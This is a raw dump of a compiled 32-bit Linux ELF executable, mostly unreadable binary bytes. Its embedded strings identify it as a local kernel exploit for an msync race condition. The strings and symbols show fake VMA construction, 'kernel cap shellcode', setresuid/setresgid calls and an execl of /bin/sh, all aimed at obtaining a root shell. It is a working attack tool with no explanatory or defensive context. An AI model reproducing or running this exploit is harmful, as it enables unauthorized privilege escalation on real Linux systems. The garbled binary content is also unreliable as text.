ELFЋ4+4 ($!444  C ((( Qtd/lib/ld-linux.so.2GNU%,)& '"#% (*!$ + *# *+)K64?vb1:2N :2wSvyXA0B>%>F>2 :p:2v79D>k@_F[UZ4>>v)>h__gmon_start__libc.so.6_IO_stdin_usedfchmodexeclsprintffopenftruncatesignalputsfork__stack_chk_failunlinkputchar_exitgetpidkillmmapsched_yieldfgetsmsyncmemset__errno_locationpausestdoutsetresgidmemcpyfcloseuselibclonesscanfsetresuidalarmmunmapmincoreusleepgettimeofdaywaitpidsetbuf__libc_start_mainwriteGLIBC_2.4GLIBC_2.2GLIBC_2.1GLIBC_2.0ii Yii cii mii w*     ıȱ̱бԱرܱ  !"#$ %$&(',(0)US[|(t X[5%%h%h%h%h%h %h(%h0%h8p%h@`%hHP%hP@%hX0%h` %ıhh%ȱhp%̱hx%бh%Աh%رh%ܱh%h%h%h%hp%h`%hP%h@%h0%h %h%h% h%h%h%h%h% h %$h(%(h0%,h8p%0h@`1^PTRhhQVh+U=t HҡHuÐUtt $ÐUD$E$Ei@BEUUS )ډD$T$$l1[]U8eE1DžD$D$$>D$$wD$ D$D$$#l!D$D$$u3D$$;;u)D$T$$Dž^t=)D$T$$|Dž9D$D$$6a$Ee3tOU(D$D$BE$LED$TD$@E$D$E${U.¡9tD$ $. ¡9tD$ $ ¡9tD$ $UE D$ED$$"d$ӝ$ߝ$$$$US$¸D$D$$ ǀBBB¸D$D$$EEDE}~EEDŽE}~E  UE}~E UE}?~܋EEDŽE}~E( ]EE}~E UE}~E( ]EE}~E UE}~ܡE UE}~ܡ`D$T$ $E$[]UEEEEUEEEE}~Uг]U8гtг$r$f$Z$$NE}Lu?̳ D$T$D$ D$D$$ EEt EEE ¡D$D$D$ "UT$D$$E}:N̳ xED$$F$WdԳtD$$D$ E$t$($`ԳtD$$]D$$$r$~̳ D$D$@$ED$ED$$/}`{ԳM$ZD$D$$^D$D$$RD$ D$D$ž$ŞD$$͞Գu $ߞD$$$L$qUVSQ,E$D$$ D$$D$$D$D$B$ӝ3ED$ED$D$ D$D$ $P D$ E$u)$$ D$D$B$uED$E$D$D$ E$E>EUD$ED$D$ D$D$$E}_~D$D$B$D$@$nD$D$B$$ $͟D$D$ $E}~9E D$$۟гt$ ${г Ë)ƉD$L$D$ D$\$$ijijuD$$u_nгtг$_ij D$T$ $$2$D$ D$D$$̳̳D$D$D$ "D$D$$uD$$$D$D$B$ߝ|D$`$̳aD$$)̳D$T$D$ D$D$$̳D$ D$$6D$`ED$$X${$S$ߝ#iD$ $̳| $$ZXz$$i6ԳGD$$zED$D$$ED$ED$$rD$'$,Y[^]aÐU]Ít&'UWVSOù #)t$1ED$E D$E$9uރ [^_]Ë$ÐUSt Ћu[]US[0Y[took %lu microseconds /proc/%d/mapsrt%x-%xin core 0x%08x-0x%08x (%d) cleanup called! from %s:%d TTsharefileTTswapTTeatfilesTTeatfileTTlibthread(sleep1)(sleep1 finished)trying to mmap back the evil page%p, evil mapped (sleep2)(sleep2 finished)doing msyncstill doing msyncfinished msync, %d, errno=%d y4'r3 1uCky k1d!-ish/bin/shexecve failed %d :(mainlinux kernel msync race condition bug discovered by sd, further research by sd and ***** this is development-in-progress code,redistribution prohibited! =============================================creating fakepageTTdummyfiledone fakepagedone %d Kb starting aggresive write!done aggresive write!creating swapfilevmamem = %p swapmem = %p, swapsize = %d unlinkstarted uselibuselib finished!pid %d waitpid got %d/%d   HHox  HoTooBRbr‰҉"2BRbrŠҊ"2BRbr‹`_0PRIVATE*kernel cap shellcode, (c) 2004 *PRIVATE[!}rmK̀qy9Uu9}u9uu1HEEEK̀At U}uaELF44 `PGCC: (GNU) 4.2.1 (Ubuntu 4.2.1-5ubuntu4)GCC: (GNU) 4.2.1 (Ubuntu 4.2.1-5ubuntu4)GCC: (GNU) 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)GCC: (GNU) 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)GCC: (GNU) 4.2.1 (Ubuntu 4.2.1-5ubuntu4)GCC: (GNU) 4.1.3 20070929 (prerelease) (Ubuntu 4.1.2-16ubuntu2)GCC: (GNU) 4.2.1 (Ubuntu 4.2.1-5ubuntu4)$"H$(`!u_IO_stdin_used5YlintvhOK'/build/buildd/glibc-2.6.1/build-tree/i386-libc/csu/crti.S/build/buildd/glibc-2.6.1/build-tree/glibc-2.6.1/csuGNU AS 2.18] /build/buildd/glibc-2.6.1/build-tree/i386-libc/csu/crtn.S/build/buildd/glibc-2.6.1/build-tree/glibc-2.6.1/csuGNU AS 2.18% $ > $ > $ > 4: ; I?  &IU%U%# init.cP /build/buildd/glibc-2.6.1/build-tree/i386-libc/csucrti.S!/!=Z!gg//H(!/!=Z!zP /build/buildd/glibc-2.6.1/build-tree/i386-libc/csucrtn.S( !!!`!!!/build/buildd/glibc-2.6.1/build-tree/glibc-2.6.1/csuGNU C 4.2.1 (Ubuntu 4.2.1-5ubuntu4)short unsigned intshort int_IO_stdin_usedlong long unsigned intunsigned charinit.clong long intH[(,`d.symtab.strtab.shstrtab.interp.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.comment.debug_aranges.debug_pubnames.debug_info.debug_abbrev.debug_line.debug_str.debug_ranges#(( 5HHL1o$; CxxKoXXoTTPg p H y0t,, Ћ xHHdd1     !!@@"\ #@ #k%PX%%}%,'o'- 0(+)@)900 #@ 9(HxT   , Ћ Hd@ ,:GVH] s0   T/  6 T    @,BSfo@ z4vb12 Ћ  ( <dC:U2lȳumB HvyXь B&7:>Lh[>sԳwz@'F F2: :D(v;̳CMCw UZ e9wz>k@@T`F[ ij ( ,<LгS[4m>>v>   m init.cinitfini.ccrtstuff.c__CTOR_LIST____DTOR_LIST____JCR_LIST__completed.5982p.5980__do_global_dtors_auxframe_dummy__CTOR_END____DTOR_END____FRAME_END____JCR_END____do_global_ctors_auxpwned.cgtimetime_starttime_endmake_libsighand__func__.4223thread__func__.4283thread_stack_GLOBAL_OFFSET_TABLE___init_array_end__init_array_start_DYNAMICdata_start__errno_location@@GLIBC_2.0sprintf@@GLIBC_2.0open@@GLIBC_2.0mmap@@GLIBC_2.0getpid@@GLIBC_2.0setbuf@@GLIBC_2.0__libc_csu_fini_startt2signal@@GLIBC_2.0__gmon_start___Jv_RegisterClasses_fp_hwuselib@@GLIBC_2.0sched_yield@@GLIBC_2.0swapsizecreate_fakepage_finiputchar@@GLIBC_2.0write@@GLIBC_2.0fd1fgets@@GLIBC_2.0memset@@GLIBC_2.0vmamemcore_stat__libc_start_main@@GLIBC_2.0execl@@GLIBC_2.0_exit@@GLIBC_2.0clone@@GLIBC_2.0ltusleep@@GLIBC_2.0_IO_stdin_usedgettimeofday@@GLIBC_2.0semt3setresuid@@GLIBC_2.0__data_startbuild_fakevmasetresgid@@GLIBC_2.0fclose@@GLIBC_2.1fd2memcpy@@GLIBC_2.0fopen@@GLIBC_2.1alarm@@GLIBC_2.0unlink@@GLIBC_2.0__dso_handlewaitpid@@GLIBC_2.0swapmemnotincorekillall__libc_csu_initprintf@@GLIBC_2.0t4ftruncate@@GLIBC_2.0close@@GLIBC_2.0mincore@@GLIBC_2.2baselimg__bss_startshellcode__stack_chk_fail@@GLIBC_2.4fd3fakespause@@GLIBC_2.0bigmem_endstdout@@GLIBC_2.0bufputs@@GLIBC_2.0fork@@GLIBC_2.0gotsigbigsizesscanf@@GLIBC_2.0munmap@@GLIBC_2.0_edatakill@@GLIBC_2.0msync@@GLIBC_2.0fchmod@@GLIBC_2.0__i686.get_pc_thunk.bxmain_init_cleanup